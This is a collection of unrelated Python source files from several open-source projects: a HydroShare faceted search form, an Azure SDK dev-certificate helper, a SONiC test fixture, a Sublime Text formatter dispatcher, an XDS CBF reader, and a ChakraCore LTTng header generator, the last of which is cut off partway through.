hs_core/discovery_form.py | tommac7/hydroshare | 178 | 30280 | from haystack.forms import FacetedSearchForm
from haystack.query import SQ
from django import forms
from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \
FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError
FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability']
class DiscoveryForm(FacetedSearchForm):
SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified')
SORT_ORDER_CHOICES = (('title', 'Title'),
('author', 'First Author'),
('created', 'Date Created'),
('modified', 'Last Modified'))
SORT_DIRECTION_VALUES = ('', '-')
SORT_DIRECTION_CHOICES = (('', 'Ascending'),
('-', 'Descending'))
NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False)
sort_order = forms.CharField(label='Sort By:',
widget=forms.Select(choices=SORT_ORDER_CHOICES),
required=False)
sort_direction = forms.CharField(label='Sort Direction:',
widget=forms.Select(choices=SORT_DIRECTION_CHOICES),
required=False)
def search(self):
self.parse_error = None # error return from parser
sqs = self.searchqueryset.all().filter(replaced=False)
if self.cleaned_data.get('q'):
# The prior code corrected for an failed match of complete words, as documented
# in issue #2308. This version instead uses an advanced query syntax in which
# "word" indicates an exact match and the bare word indicates a stemmed match.
cdata = self.cleaned_data.get('q')
try:
parser = ParseSQ()
parsed = parser.parse(cdata)
sqs = sqs.filter(parsed)
except ValueError as e:
sqs = self.searchqueryset.none()
self.parse_error = "Value error: {}. No matches. Please try again".format(e.value)
return sqs
except MatchingBracketsNotFoundError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except MalformedDateError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except FieldNotRecognizedError as e:
sqs = self.searchqueryset.none()
self.parse_error = \
("{} Field delimiters include title, contributor, subject, etc. " +
"Please try again.")\
.format(e.value)
return sqs
except InequalityNotAllowedError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
geo_sq = None
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq = SQ(east__lte=float(self.cleaned_data['NElng']))
geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng']))
geo_sq.add(SQ(east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
# latitude might be specified without longitude
if geo_sq is None:
geo_sq = SQ(north__lte=float(self.cleaned_data['NElat']))
else:
geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq is not None:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
start_date = self.cleaned_data['start_date']
end_date = self.cleaned_data['end_date']
# allow overlapping ranges
# cs < s < ce OR s < cs => s < ce
# AND
# cs < e < ce OR e > ce => cs < e
if start_date and end_date:
sqs = sqs.filter(SQ(end_date__gte=start_date) &
SQ(start_date__lte=end_date))
elif start_date:
sqs = sqs.filter(SQ(end_date__gte=start_date))
elif end_date:
sqs = sqs.filter(SQ(start_date__lte=end_date))
if self.cleaned_data['coverage_type']:
sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])
creator_sq = None
contributor_sq = None
owner_sq = None
subject_sq = None
content_type_sq = None
availability_sq = None
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
value = sqs.query.clean(value)
if value:
if "creator" in field:
if creator_sq is None:
creator_sq = SQ(creator__exact=value)
else:
creator_sq.add(SQ(creator__exact=value), SQ.OR)
if "contributor" in field:
if contributor_sq is None:
contributor_sq = SQ(contributor__exact=value)
else:
contributor_sq.add(SQ(contributor__exact=value), SQ.OR)
elif "owner" in field:
if owner_sq is None:
owner_sq = SQ(owner__exact=value)
else:
owner_sq.add(SQ(owner__exact=value), SQ.OR)
elif "subject" in field:
if subject_sq is None:
subject_sq = SQ(subject__exact=value)
else:
subject_sq.add(SQ(subject__exact=value), SQ.OR)
elif "content_type" in field:
if content_type_sq is None:
content_type_sq = SQ(content_type__exact=value)
else:
content_type_sq.add(SQ(content_type__exact=value), SQ.OR)
elif "availability" in field:
if availability_sq is None:
availability_sq = SQ(availability__exact=value)
else:
availability_sq.add(SQ(availability__exact=value), SQ.OR)
else:
continue
if creator_sq is not None:
sqs = sqs.filter(creator_sq)
if contributor_sq is not None:
sqs = sqs.filter(contributor_sq)
if owner_sq is not None:
sqs = sqs.filter(owner_sq)
if subject_sq is not None:
sqs = sqs.filter(subject_sq)
if content_type_sq is not None:
sqs = sqs.filter(content_type_sq)
if availability_sq is not None:
sqs = sqs.filter(availability_sq)
return sqs
|
scripts/devops_tasks/trust_proxy_cert.py | vincenttran-msft/azure-sdk-for-python | 2,728 | 30287 | <filename>scripts/devops_tasks/trust_proxy_cert.py
import requests
import os
EXISTING_ROOT_PEM = requests.certs.where()
root_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), "..", "..", ".."))
LOCAL_DEV_CERT = os.path.abspath(os.path.join(root_dir, 'eng', 'common', 'testproxy', 'dotnet-devcert.crt'))
COMBINED_FILENAME = os.path.basename(LOCAL_DEV_CERT).split(".")[0] + ".pem"
COMBINED_FOLDER = os.path.join(root_dir, '.certificate')
COMBINED_LOCATION = os.path.join(COMBINED_FOLDER, COMBINED_FILENAME)
def copy_cert_content():
with open(LOCAL_DEV_CERT, 'r') as f:
data = f.read()
if not os.path.exists(COMBINED_FOLDER):
os.mkdir(COMBINED_FOLDER)
with open(COMBINED_LOCATION, 'w') as f:
f.write(data)
def combine_cert_file():
with open(EXISTING_ROOT_PEM, 'r') as f:
content = f.readlines();
with open(COMBINED_LOCATION, 'a') as f:
f.writelines(content)
if __name__ == "__main__":
copy_cert_content()
combine_cert_file()
print("Set the following certificate paths:")
print("\tSSL_CERT_DIR={}".format(os.path.dirname(COMBINED_LOCATION)))
print("\tREQUESTS_CA_BUNDLE={}".format(COMBINED_LOCATION))
if os.getenv('TF_BUILD', False):
print("##vso[task.setvariable variable=SSL_CERT_DIR]{}".format(os.path.dirname(COMBINED_LOCATION)))
print("##vso[task.setvariable variable=REQUESTS_CA_BUNDLE]{}".format(COMBINED_LOCATION))
|
tests/stress/conftest.py | lolyu/sonic-mgmt | 132 | 30303 | import logging
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
ptf_ip = tbinfo["ptf_ip"]
topo_name = tbinfo["topo"]["name"]
logger.info("withdraw existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 100)
ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
logger.info("ipv4 route used {}".format(ipv4_route_used_before))
logger.info("ipv6 route used {}".format(ipv6_route_used_before))
yield ipv4_route_used_before, ipv6_route_used_before
logger.info("announce existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 5)
logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
|
codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | 676 | 30342 | # @author <NAME>
# @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>)
# @link http://longman.me
# @license The MIT License (MIT)
import os
import sys
import re
import sublime
directory = os.path.dirname(os.path.realpath(__file__))
libs_path = os.path.join(directory, 'lib')
if libs_path not in sys.path:
sys.path.append(libs_path)
try:
# Python 3
from .phpformatter import PhpFormatter
from .jsformatter import JsFormatter
from .htmlformatter import HtmlFormatter
from .cssformatter import CssFormatter
from .scssformatter import ScssFormatter
from .pyformatter import PyFormatter
from .vbscriptformatter import VbscriptFormatter
from .coldfusionformatter import ColdfusionFormatter
from .goformatter import GoFormatter
except (ValueError):
# Python 2
from phpformatter import PhpFormatter
from jsformatter import JsFormatter
from htmlformatter import HtmlFormatter
from cssformatter import CssFormatter
from scssformatter import ScssFormatter
from pyformatter import PyFormatter
from vbscriptformatter import VbscriptFormatter
from coldfusionformatter import ColdfusionFormatter
from goformatter import GoFormatter
class Formatter:
def __init__(self, view, syntax=None):
self.platform = sublime.platform()
self.classmap = {}
self.st_version = 2
if sublime.version() == '' or int(sublime.version()) > 3000:
self.st_version = 3
self.file_name = view.file_name()
self.settings = sublime.load_settings('CodeFormatter.sublime-settings')
self.packages_path = sublime.packages_path()
self.syntax_file = view.settings().get('syntax')
self.syntax = syntax or self.get_syntax()
# map of settings names with related class
map_settings_formatter = [
('codeformatter_php_options', PhpFormatter),
('codeformatter_js_options', JsFormatter),
('codeformatter_css_options', CssFormatter),
('codeformatter_html_options', HtmlFormatter),
('codeformatter_python_options', PyFormatter),
('codeformatter_vbscript_options', VbscriptFormatter),
('codeformatter_scss_options', ScssFormatter),
('codeformatter_coldfusion_options', ColdfusionFormatter),
('codeformatter_go_options', GoFormatter),
]
for name, _class in map_settings_formatter:
syntaxes = self.settings.get(name, {}).get('syntaxes')
if not syntaxes or not isinstance(syntaxes, str):
continue
for _formatter in syntaxes.split(','):
self.classmap[_formatter.strip()] = _class
def format(self, text):
formatter = self.classmap[self.syntax](self)
try:
stdout, stderr = formatter.format(text)
except Exception as e:
stdout = ''
stderr = str(e)
return self.clean(stdout), self.clean(stderr)
def exists(self):
return self.syntax in self.classmap
def get_syntax(self):
pattern = re.compile(
r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')
m = pattern.search(self.syntax_file)
found = ''
if m and len(m.groups()) > 0:
found = m.groups()[0]
return found.lower()
def format_on_save_enabled(self):
if not self.exists():
return False
formatter = self.classmap[self.syntax](self)
return formatter.format_on_save_enabled(self.file_name)
def clean(self, string):
if hasattr(string, 'decode'):
string = string.decode('UTF-8', 'ignore')
return re.sub(r'\r\n|\r', '\n', string)
|
iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | 155 | 30344 | #!/usr/bin/env libtbx.python
#
# iotbx.xds.xds_cbf.py
#
# <NAME>, Diamond Light Source, 2012/OCT/16
#
# Class to read the CBF files used in XDS
#
from __future__ import absolute_import, division, print_function
class reader:
"""A class to read the CBF files used in XDS"""
def __init__(self):
pass
def read_file(self, filename):
"""Read the CBF file"""
import pycbf
self.cbf_handle = pycbf.cbf_handle_struct()
self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST)
self.cbf_handle.rewind_datablock()
def get_data(self):
"""Get the gain array from the file"""
import numpy
# Select the first datablock and rewind all the categories
self.cbf_handle.select_datablock(0)
self.cbf_handle.select_category(0)
self.cbf_handle.select_column(2)
self.cbf_handle.select_row(0)
# Check the type of the element to ensure it's a binary
# otherwise raise an exception
type = self.cbf_handle.get_typeofvalue()
if type.find('bnry') > -1:
# Read the image data into an array
image_string = self.cbf_handle.get_integerarray_as_string()
image = numpy.fromstring(image_string, numpy.int32)
# Get the array parameters
parameters = self.cbf_handle.get_integerarrayparameters_wdims()
image_size = (parameters[10], parameters[9])
# Resize the image
image.shape = (image_size)
else:
raise TypeError('Can\'t find image')
# Return the image
return image
if __name__ == '__main__':
import sys
import numpy
handle = reader()
handle.read_file(sys.argv[1])
image = handle.get_data()
|
tools/lttng.py | Taritsyn/ChakraCore | 8,664 | 30346 | #-------------------------------------------------------------------------------------------------------
# Copyright (C) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
#-------------------------------------------------------------------------------------------------------
import xml.dom.minidom as DOM
lttngDataTypeMapping = {
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const char *",
"win:GUID" :"const int",
"win:AnsiString" :"const char*",
"win:UnicodeString" :"const char*",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const uintptr_t",
"win:Binary" :"const char"
}
ctfDataTypeMapping = {
"win:Int64" :"ctf_integer",
"win:HexInt64" :"ctf_integer_hex",
"win:ULong" :"ctf_integer",
"win:count" :"ctf_sequence",
"win:Struct" :"ctf_sequence",
"win:GUID" :"ctf_sequence",
"win:AnsiString" :"ctf_string",
"win:UnicodeString" :"ctf_string",
"win:Double" :"ctf_float",
"win:Int32" :"ctf_integer",
"win:HexInt32" :"ctf_integer_hex",
"win:Boolean" :"ctf_integer",
"win:UInt64" :"ctf_integer",
"win:UInt32" :"ctf_integer",
"win:UInt16" :"ctf_integer",
"win:HexInt16" :"ctf_integer_hex",
"win:UInt8" :"ctf_integer", #actually a character
"win:Int8" :"ctf_integer", #actually a character
"win:Pointer" :"ctf_integer",
"win:Binary" :"ctf_sequence",
"xs:string" :"ctf_string",
"xs:unsignedLong" :"ctf_integer",
"xs:unsignedInt" :"ctf_integer"
}
palDataTypeMapping ={
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const void",
"win:GUID" :"const GUID",
"win:AnsiString" :"LPCSTR",
"win:UnicodeString" :"PCWSTR",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const void*",
"win:Binary" :"const char"
}
MAX_LTTNG_ARGS = 10
def getParamSequenceSize(paramSequence, estimate):
total = 0
pointers =0
for param in paramSequence:
if param in ["win:Int64", "win:UInt64", "win:Double"]:
total += 8
elif param in ["win:ULong", "win:Int32", "win:Boolean",]:
total += 4
elif param == "GUID":
total += 16
elif param in ["win:UInt16"]:
total += 2
elif param in ["win:Uint8", "win:Binary"]:
total += 1
elif param == "win:Pointer":
if estimate:
total += 8
else:
pointers += 1
elif estimate:
if param in ["win:AnsiString", "win:Struct"]:
total += 32
elif param in ["win:UnicodeString"]:
total += 64
else:
raise Exception ("Don't know size of " + param)
if estimate:
return total
return total, pointers
class Template:
def __repr__(self):
return "<Template " + self.name + " />"
def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts):
self.name = name
self.signature = FunctionSignature()
self.structCounts = structCounts
self.arrayCounts = arrayCounts
for variable in prototypes.paramList:
for dependency in dependencies[variable]:
if not self.signature.getParam(dependency):
self.signature.append(dependency, prototypes.getParam(dependency))
@property
def num_params(self):
return len(self.signature.paramList)
def getParam(self, name):
return self.signature.getParam(name)
@property
def estimatedSize(self):
total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True)
if total < 32:
return 32
elif total > 1024:
return 1024
return total
class FunctionSignature:
def __repr__(self):
return ', '.join(self.paramList)
def __init__(self):
self.LUT = {}
self.paramList = []
def append(self, variable, param):
self.LUT[variable] = param
self.paramList.append(variable)
def getParam(self, variable):
return self.LUT.get(variable)
def getLength(self):
return len(self.paramList)
class FunctionParameter:
def __repr__(self):
return self.name
def __init__(self, winType, name, count, outType, length):
self.winType = winType
self.outType = outType
self.name = name
self.length = length
self.count = "win:null"
if winType == "win:GUID" or count == "win:count":
self.count = "win:count"
ignoredXmlAttributes = frozenset(["map"])
usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"])
knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes
def checkKnownAttributes(nodes, templateName):
for node in nodes:
nodeMap = node.attributes
for attribute in nodeMap.values():
if attribute.name not in knownXmlAttributes:
raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName)
def getTopLevelElementsByTagName(node, tag):
return [e for e in node.getElementsByTagName(tag) if e.parentNode == node]
def parseTemplateNodes(templateNodes):
templates = {}
for templateNode in templateNodes:
templateName = templateNode.getAttribute('tid')
dataNodes = getTopLevelElementsByTagName(templateNode, 'data')
checkKnownAttributes(dataNodes, templateName)
functionPrototypes = FunctionSignature()
arrayCounts = {}
structCounts = {}
var_Dependencies = {}
for dataNode in dataNodes:
variable = dataNode.getAttribute('name')
wintype = dataNode.getAttribute('inType')
outType = dataNode.getAttribute('outType')
wincount = dataNode.getAttribute('count')
winLength = dataNode.getAttribute('length')
var_dependency = [variable]
if winLength:
if wincount:
raise Exception("Both count and length properties found on " + variable + " in template " + templateName)
if wincount.isdigit() and int(wincount) == 1:
wincount = ''
if wincount:
if wincount.isdigit():
raise Exception("Expect constant count to be length")
elif functionPrototypes.getParam(wincount):
var_dependency.insert(0, wincount)
arrayCounts[variable] = wincount
var_Dependencies[variable] = var_dependency
functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength)
functionPrototypes.append(variable, functionParameter)
structNodes = getTopLevelElementsByTagName(templateNode, 'struct')
for structNode in structNodes:
structName = structNode.getAttribute('name')
countName = structNode.getAttribute('count')
assert(countName in functionPrototypes.paramList)
#childData = structNode.getElementsByTagName("data")
#names = [x.attributes['name'].value for x in childData]
#types = [x.attributes['inType'].value for x in childData]
structCounts[structName] = countName
var_Dependencies[structName] = [countName, structName]
functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None)
functionPrototypes.append(structName, functionParameterPointer)
templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts)
return templates
def shouldPackTemplate(template):
return template.num_params > MAX_LTTNG_ARGS or len(template.structCounts) > 0 or len(template.arrayCounts) > 0
def generateArgList(template):
# Construct a TP_ARGS macro call, as defined in another macro, e.g.
#
# TP_ARGS( \
# int, my_integer_arg, \
# char*, my_string_arg \
# )
header = "TP_ARGS( \\\n"
footer = "\\\n)"
args = []
if shouldPackTemplate(template):
args.append(" const unsigned int, length")
args.append(" const char *, __data__")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
mappedType = lttngDataTypeMapping[wintypeName]
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
arg = " " + mappedType
if mappedCount != " ":
arg += mappedCount
elif functionParam.length:
arg += "*"
arg += ", " + functionParam.name
args.append(arg)
return header + ", \\\n".join(args) + footer
def generateFieldList(template):
# Construct a TP_FIELDS macro call, e.g.
# TP_FIELDS(
# ctf_string(my_string_field, my_string_arg)
# ctf_integer(int, my_integer_field, my_integer_arg)
# )
header = " " + " TP_FIELDS(\n"
footer = "\n )"
fieldList = []
if shouldPackTemplate(template):
fieldList.append(" ctf_integer(unsigned long, length, length)")
fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "")
if functionParam.outType:
wintypeName = functionParam.outType
ctf_type = None
field_body = None
varname = functionParam.name
if param in template.structCounts or param in template.arrayCounts:
# This is a struct, treat as a sequence
countVar = template.structCounts.get(param, template.arrayCounts.get(param))
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.prop))
elif functionParam.length:
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length))
else:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string":
field_body = ", ".join((varname, varname))
elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float":
field_body = ", ".join((mappedType, varname, varname))
elif ctf_type == "ctf_sequence":
raise Exception("ctf_sequence needs special handling: " + template.name + " " + param)
else:
raise Exception("Unhandled ctf intrinsic: " + ctf_type)
# fieldList.append("// " + wintypeName)
fieldList.append(" %s(%s)" % (ctf_type, field_body))
return header + "\n".join(fieldList) + footer
def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events):
headerLines = []
headerLines.append("")
headerLines.append("#ifdef __int64")
headerLines.append("#if TARGET_64")
headerLines.append("#undef __int64")
headerLines.append("#else")
headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")
headerLines.append("#endif // TARGET_64")
headerLines.append("#endif // __int64")
headerLines.append("#undef TRACEPOINT_PROVIDER")
headerLines.append("#undef TRACEPOINT_INCLUDE")
headerLines.append("")
headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n")
headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n")
headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")
headerLines.append("#define LTTNG_CHAKRA_H" + providerName +"\n")
headerLines.append("\n#include <lttng/tracepoint.h>\n\n")
for templateName in templates:
template = templates[templateName]
functionSignature = template.signature
headerLines.append("")
headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\")
tracepointArgs = generateArgList(template)
headerLines.append(tracepointArgs)
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" " + templateName + ",")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS,")
tracepointFields = generateFieldList(template)
headerLines.append(tracepointFields)
headerLines.append(")")
headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" " + templateName + ",\\")
headerLines.append(" name,\\")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS \\")
headerLines.append(")")
headerLines.append("")
headerLines.append("")
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" emptyTemplate,")
headerLines.append(" TP_ARGS(),")
headerLines.append(" TP_FIELDS()")
headerLines.append(")")
headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" emptyTemplate,\\")
headerLines.append(" name,\\")
headerLines.append(" TP_ARGS()\\")
headerLines.append(")")
headerLines.append("")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
if not eventName:
raise Exception(eventNode + " event does not have a symbol")
if not templateName:
headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")")
continue
headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")")
headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */")
headerLines.append("#include <lttng/tracepoint-event.h>")
return "\n".join(headerLines)
def generateMethodBody(template, providerName, eventName):
# Convert from ETW's windows types to LTTng compatiable types
methodBody = [""]
functionSignature = template.signature
if not shouldPackTemplate(template):
invocation = ["do_tracepoint(" + providerName, eventName]
for paramName in functionSignature.paramList:
functionParam = functionSignature.getParam(paramName)
wintypeName = functionParam.winType
winCount = functionParam.count
ctf_type = None
if functionParam.outType:
ctf_type = ctfDataTypeMapping.get(functionParam.outType)
else:
ctf_Type = ctfDataTypeMapping.get(winCount)
if not ctf_type:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString":
# Convert wchar unicode string to utf8
if functionParam.length:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");")
else:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");")
invocation.append(paramName + "_converter")
# elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer":
elif wintypeName == "win:Pointer":
invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName)
else:
invocation.append(paramName)
methodBody.append(",\n ".join(invocation) + ");")
else:
# Packing results into buffer
methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];")
methodBody.append("char *buffer = stackBuffer;")
methodBody.append("int offset = 0;")
methodBody.append("int size = " + str(template.estimatedSize) + ";")
methodBody.append("bool fixedBuffer = true;")
methodBody.append("bool success = true;")
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
if paramName in template.structCounts:
size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif paramName in template.arrayCounts:
size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif functionParameter.winType == "win:GUID":
methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);")
else:
methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);")
methodBody.append("if (!success)")
methodBody.append("{")
methodBody.append(" if (!fixedBuffer) delete[] buffer;")
methodBody.append(" return ERROR_WRITE_FAULT;")
methodBody.append("}")
methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);")
methodBody.append("if (!fixedBuffer) delete[] buffer;")
return "\n ".join(methodBody) + "\n"
def generateMethodSignature(template):
if not template:
return ""
functionSignature = template.signature
lineFunctionPrototype = []
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
wintypeName = functionParameter.winType
mappedType = palDataTypeMapping[wintypeName]
winCount = functionParameter.count
mappedCount = palDataTypeMapping[winCount]
if paramName in template.structCounts:
lineFunctionPrototype.append(" int " + paramName + "_ElementSize")
# lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length))
lineFunctionPrototype.append(
" " + mappedType
+ (mappedCount if mappedCount != " " else "*" if functionParameter.length and not wintypeName in ["win:UnicodeString", "win:AnsiString"] else "")
+ " "
+ functionParameter.name)
return ",\n".join(lineFunctionPrototype)
def generateLttngTracepointProvider(providerName, lttngHeader, templates, events):
providerLines = [];
providerLines.append("#define TRACEPOINT_DEFINE")
providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")
providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")
providerLines.append("#endif")
providerLines.append("#include \"stdlib.h\"")
providerLines.append("#include \"Common.h\"")
providerLines.append("#include \"Codex/Utf8Helper.h\"")
providerLines.append("#include \"" + lttngHeader + "\"\n\n")
providerLines.append("#ifndef tracepoint_enabled")
providerLines.append("#define tracepoint_enabled(provider, name) 1")
providerLines.append("#define do_tracepoint tracepoint")
providerLines.append("#endif")
providerLines.append("""
bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer)
{
newSize *= 1.5;
_ASSERTE(newSize > size); // Check for overflow
if (newSize < 32)
{
newSize = 32;
}
char *newBuffer = new char[newSize];
memcpy(newBuffer, buffer, currentLength);
if (!fixedBuffer)
{
delete[] buffer;
}
buffer = newBuffer;
size = newSize;
fixedBuffer = false;
return true;
}
bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer)
{
if (!src)
{
return true;
}
if (offset + len > size)
{
if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer))
{
return false;
}
}
memcpy(buffer + offset, src, len);
offset += len;
return true;
}
template <typename T>
bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer)
{
if (sizeof(T) + offset > size)
{
if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer))
{
return false;
}
}
*(T *)(buffer + offset) = value;
offset += sizeof(T);
return true;
}
""")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
